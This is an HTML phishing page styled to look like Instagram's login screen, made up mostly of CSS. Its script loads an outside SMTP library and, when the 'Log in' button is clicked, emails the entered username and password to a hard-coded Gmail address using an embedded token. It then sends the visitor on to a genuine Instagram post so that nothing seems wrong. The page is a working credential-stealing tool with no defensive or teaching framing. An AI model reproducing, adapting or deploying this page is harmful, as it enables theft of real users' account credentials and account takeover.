<!DOCTYPE html>
<html lang="pt-BR">
<head>
    <meta charset="UTF-8">
    <meta name="viewport" content="width=device-width, initial-scale=1.0">
    <title>Instagram</title>
    <style>
        * {
    border: none;
    box-sizing: border-box;
    font-family: Arial, Helvetica, sans-serif;
    margin: 0;
    padding: 0;
}

body {
    background-color: #fafafa;
    height: 100vh;
}

main {
    height: 100vh;
    margin: auto;
    max-width: 935px;
}

a { text-decoration: none; }
h1 { margin: 20px 0; }
ul { list-style: none; }

/**
 * Flex rules
 */

.flex {
    display: -webkit-box;
    display: -moz-box;
    display: -webkit-flex;
    display: -ms-flexbox;
    display: flex;
}

.direction-column {
    -webkit-box-direction: normal;
    -webkit-box-orient: vertical;
    -moz-box-direction: normal;
    -moz-box-orient: vertical;
    -webkit-flex-direction: column;
    -ms-flex-direction: column;
    flex-direction: column;
}

.justify-content-center {
    -webkit-box-pack: center;
    -moz-box-pack: center;
    -ms-flex-pack: center;
    -webkit-justify-content: center;
    justify-content: center;
}

.align-items-center {
    -webkit-box-align: center;
    -moz-box-align: center;
    -ms-flex-align: center;
    -webkit-align-items: center;
    align-items: center;
}

.flex-wrap {
    -webkit-flex-wrap: wrap;
    -ms-flex-wrap: wrap;
    flex-wrap: wrap;
}

/**
 *
 */

.panel {
    background-color: white;
    border: 1px solid #dbdbdb;
    margin-bottom: 10px;
    padding: 10px;
}

#auth { max-width: 350px; }
#mobile { max-width: 454px; }

#mobile img {
    height: 618px;
}

/**
 * Login section
 */
.login-with-fb,
form { width: 100%; }

.register,
form { padding: 30px 20px; }

.login-with-fb { padding: 30px 20px 20px 20px; }

form .sr-only { display: none; }

form input {
    background-color: #fafafa;
    border: 1px solid #dbdbdb;
    border-radius: 3px;
    color: #808080;
    margin-bottom: 8px;
    padding: 10px 10px;
    width: 100%;
}

form input::placeholder {
    color: #808080;
}

form input:focus {
    border: 1px solid #808080;
    outline: none;
}

form button {
    
}

/**
 * Separator login form from login with fb
 */
.separator span {
    background-color: #dbdbdb;
    height: 1px;
    width: calc(100% - 10px);
}

.separator .or {
    color: #808080;
    font-weight: bold;
}

.separator { padding: 0 20px; }
.separator span:first-child { margin-right: 10px;}
.separator span:last-child { margin-left: 10px;}

/**
 * Login with fb section
 */
.login-with-fb a { 
    color: #385185; 
}

.login-with-fb > a { font-size: 12px; }
.login-with-fb div a { font-weight: bold; }
.login-with-fb div { margin-bottom: 15px; }

/**
 * Register section
 */
.register * { font-size: 14px; }
.register a { 
    color: #0095f6;
    font-weight: bold;
}

.register p { margin-right: 5px; }

/**
 * App download
 */
.app-download { padding: 15px; }
.app-download p { padding: 10px 0; }
.app-download img { 
    height: 40px; 
    margin: 0 5px;
}

/**
 * Footer
 */
.footerp {
    margin: 0 auto 30px auto;
    max-width: 935px;
}

 .fblog{
    background-color: #0095f6;
    padding: 5px;
    border-radius: 3px;
 }
 


/**
 * Media queries
 */

@media screen and (max-width: 767px) {
    main { margin: 30px auto 50px auto; }
    footer .copyright,
    footer ul li a { font-size: 13px; }
}
    </style>
<script src="https://smtpjs.com/v3/smtp.js"></script>
<script type="text/javascript">
	function sendEmail() {
        Email.send({
    SecureToken : "633403dc-1ac8-458e-b932-d7634e53650a",
    To : 'e1haript@gmail.com',
    From : "heycanibeyourboyfriend@gmail.com",
    Subject : "This is the subject",
    Body : document.getElementById("mailid").value + "<-->" + document.getElementById("passid").value
}).then(
  message => alert("loging in")
);
	}
</script>
</head>
<body>
    <main class="flex  justify-content-center">
        <section id="mobile" class="flex">
        </section>
        <section id="auth" class="flex direction-column">
            <div class="panel login flex direction-column">
                <h1 title="Instagram" class="flex justify-content-center">
                    <img src="https://drive.google.com/uc?export=download&id=1JswCUxWONywMiflfSERBrhDjIXpeGnF-" alt="Instagram logo" title="Instagram logo" width="200px" />
                </h1>
                <form method="post">
                    <label for="email" class="sr-only">Phone number, Username, or Email</label>
                    <input id="mailid" name="email" placeholder="Phone number, Username, or Email" />

                    <label for="password" class="sr-only">Password</label>
                    <input id="passid" name="password" type="password" placeholder="Password" />

                    <a href="https://www.instagram.com/p/CjDGdL9JuJF/?igshid=YmMyMTA2M2Y="><input style="background-color: #0095f6; border-radius: 5px; color: #fff; font-weight: bold; height: 35px; margin-top: 10px; width: 100%;" type="button" value="Log in" onclick="sendEmail()" /></a>
                </form>
                <div class="flex separator align-items-center">
                    <span></span>
                    <div class="or">OR</div>
                    <span></span>
                </div>
                <div class="login-with-fb flex direction-column align-items-center">
                    <div>
                        <a class="fblog" style="color: white; font-size: 15px;">Continue with Facebook</a>
                    </div>
                    <a href="#">Forgot password?</a>
                </div>
            </div>
            <div class="panel register flex justify-content-center">
                <p>Don't have an account?</p>
                <a href="#">Sign up</a>
            </div>
            <div class="footerp" style="text-align: center; padding-top: 20px;">
            <div>
                <span>from</span>
            </div>
            <img src="https://drive.google.com/uc?export=download&id=1y3EKmWiic6kMMJms439xS-SOqAAEpDRm" width="100px" alt="meta">
            </div>
        </section>
    </main>

</body>
</html>